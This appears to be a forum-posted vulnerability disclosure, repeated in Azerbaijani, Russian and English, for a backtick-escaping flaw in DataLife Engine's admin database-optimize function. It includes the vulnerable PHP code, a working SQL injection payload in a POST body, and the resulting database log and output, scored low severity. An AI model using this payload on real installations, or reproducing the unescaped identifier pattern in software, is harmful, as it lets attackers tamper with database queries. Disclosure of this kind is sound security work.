Sorğu 1:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=optimize
Sorğu 2:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=repair
Kod:
Code:
if( $action == "dboption" AND is_array($_REQUEST['ta']) AND count( $_REQUEST['ta'] ) ) {
$arr = $_REQUEST['ta'];
reset( $arr );
$tables = "";
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
$tables = substr( $tables, 1 );
if( $_REQUEST['whattodo'] == "optimize" ) {
$row = $db->super_query("SHOW TABLE STATUS WHERE Name = '" . PREFIX . "_post'");
$storage_engine = $row['Engine'];
if ( strtolower($storage_engine) == "innodb" ) {
$query = "ANALYZE TABLE ";
} else $query = "OPTIMIZE TABLE ";
} else {
$query = "REPAIR TABLE ";
}
$query .= $tables;
$db->query( "INSERT INTO " . USERPREFIX . "_admin_logs (name, date, ip, action, extras) values ('".$db->safesql($member_id['name'])."', '{$_TIME}', '{$_IP}', '23', '')" );
if( $db->query( $query ) ) {
msg( "success", $lang['db_ok'], $lang['db_ok_1'], "?mod=dboption" );
} else {
msg( "error", $lang['db_err'], $lang['db_err_1'], "?mod=dboption" );
}
}
Problem:
Backtick (`) "escape" olmur deyə (SQL) sorğudan çıxmaq olur. Safesql funksiyası backtick-i "escape" etmir.
Code:
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
Təsir:
Məlumat bazasına gedən sorğunu manipulasiya etmək olur. Misal: Aşağıdakı sorğuda ANALYZE TABLE ilə UPDATE HISTOGRAM istifadə etmək olar.
Code:
ta[]=dle_admin_logs` UPDATE HISTOGRAM ON date;#&whattodo=optimize
Məlumat Bazasına gedən sorğu:
Code:
2024-05-15T15:16:28.523068Z 14805 Query ANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`
Məlumat bazasından gələn cavab:
Code:
+-----------------------+-----------+----------+-------------------------------------------------+
| Table | Op | Msg_type | Msg_text |
+-----------------------+-----------+----------+-------------------------------------------------+
| dle_db.dle_admin_logs | histogram | status | Histogram statistics created for column 'date'. |
+-----------------------+-----------+----------+-------------------------------------------------+
Dəyişiklik (bizim halda backtick-dən çıxmaq və sorğu funksiyalarını istifadə etmək) sistemin bütövlüyünü təhlükə altına qoya bilər.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low
Запрос 1:
Запрос 2:
Код:
Проблема:
Здесь бэктик (`) не эскейпится, из-за чего можно выходить из запроса. Функция safesql не эксэйпит бэктик.
Импакт:
Можно изменить запрос который идёт в БД. Например: можно использовать UPDATE HISTOGRAM для ANALYZE TABLE в первом запросе.
Лог в БД:
Ответ в БД
Изменение (в нашем случаи выход из бэктрик и использование функций запроса) могут поставить под угрозу целостность системы.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=optimize
Запрос 2:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=repair
Код:
Code:
if( $action == "dboption" AND is_array($_REQUEST['ta']) AND count( $_REQUEST['ta'] ) ) {
$arr = $_REQUEST['ta'];
reset( $arr );
$tables = "";
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
$tables = substr( $tables, 1 );
if( $_REQUEST['whattodo'] == "optimize" ) {
$row = $db->super_query("SHOW TABLE STATUS WHERE Name = '" . PREFIX . "_post'");
$storage_engine = $row['Engine'];
if ( strtolower($storage_engine) == "innodb" ) {
$query = "ANALYZE TABLE ";
} else $query = "OPTIMIZE TABLE ";
} else {
$query = "REPAIR TABLE ";
}
$query .= $tables;
$db->query( "INSERT INTO " . USERPREFIX . "_admin_logs (name, date, ip, action, extras) values ('".$db->safesql($member_id['name'])."', '{$_TIME}', '{$_IP}', '23', '')" );
if( $db->query( $query ) ) {
msg( "success", $lang['db_ok'], $lang['db_ok_1'], "?mod=dboption" );
} else {
msg( "error", $lang['db_err'], $lang['db_err_1'], "?mod=dboption" );
}
}
Здесь бэктик (`) не эскейпится, из-за чего можно выходить из запроса. Функция safesql не эксэйпит бэктик.
Code:
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
Импакт:
Можно изменить запрос который идёт в БД. Например: можно использовать UPDATE HISTOGRAM для ANALYZE TABLE в первом запросе.
Code:
ta[]=dle_admin_logs` UPDATE HISTOGRAM ON date;#&whattodo=optimize
Лог в БД:
Code:
2024-05-15T15:16:28.523068Z 14805 Query ANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`
Ответ в БД
Code:
+-----------------------+-----------+----------+-------------------------------------------------+
| Table | Op | Msg_type | Msg_text |
+-----------------------+-----------+----------+-------------------------------------------------+
| dle_db.dle_admin_logs | histogram | status | Histogram statistics created for column 'date'. |
+-----------------------+-----------+----------+-------------------------------------------------+
Изменение (в нашем случаи выход из бэктрик и использование функций запроса) могут поставить под угрозу целостность системы.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low
Request 1:
Request 2:
Code:
Problem:
Backtick (`) isn't getting escaped, that's why it is possible to modify the query getting tot the database. Function safesql doesn't escape backtick.
Impact:
You can change the query that goes to the database. For example, you can use UPDATE HISTOGRAM for ANALYZE TABLE in the first query
Log in DB
Answer from DB
Making changes (in our case, escaping backticks and using query functions) might jeopardize the integrity of the system.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=optimize
Request 2:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=repair
Code:
Code:
if( $action == "dboption" AND is_array($_REQUEST['ta']) AND count( $_REQUEST['ta'] ) ) {
$arr = $_REQUEST['ta'];
reset( $arr );
$tables = "";
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
$tables = substr( $tables, 1 );
if( $_REQUEST['whattodo'] == "optimize" ) {
$row = $db->super_query("SHOW TABLE STATUS WHERE Name = '" . PREFIX . "_post'");
$storage_engine = $row['Engine'];
if ( strtolower($storage_engine) == "innodb" ) {
$query = "ANALYZE TABLE ";
} else $query = "OPTIMIZE TABLE ";
} else {
$query = "REPAIR TABLE ";
}
$query .= $tables;
$db->query( "INSERT INTO " . USERPREFIX . "_admin_logs (name, date, ip, action, extras) values ('".$db->safesql($member_id['name'])."', '{$_TIME}', '{$_IP}', '23', '')" );
if( $db->query( $query ) ) {
msg( "success", $lang['db_ok'], $lang['db_ok_1'], "?mod=dboption" );
} else {
msg( "error", $lang['db_err'], $lang['db_err_1'], "?mod=dboption" );
}
}
Backtick (`) isn't getting escaped, that's why it is possible to modify the query getting tot the database. Function safesql doesn't escape backtick.
Code:
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
Impact:
You can change the query that goes to the database. For example, you can use UPDATE HISTOGRAM for ANALYZE TABLE in the first query
Code:
ta[]=dle_admin_logs` UPDATE HISTOGRAM ON date;#&whattodo=optimize
Log in DB
Code:
2024-05-15T15:16:28.523068Z 14805 Query ANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`
Answer from DB
Code:
+-----------------------+-----------+----------+-------------------------------------------------+
| Table | Op | Msg_type | Msg_text |
+-----------------------+-----------+----------+-------------------------------------------------+
| dle_db.dle_admin_logs | histogram | status | Histogram statistics created for column 'date'. |
+-----------------------+-----------+----------+-------------------------------------------------+
Making changes (in our case, escaping backticks and using query functions) might jeopardize the integrity of the system.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low
Son redaktə: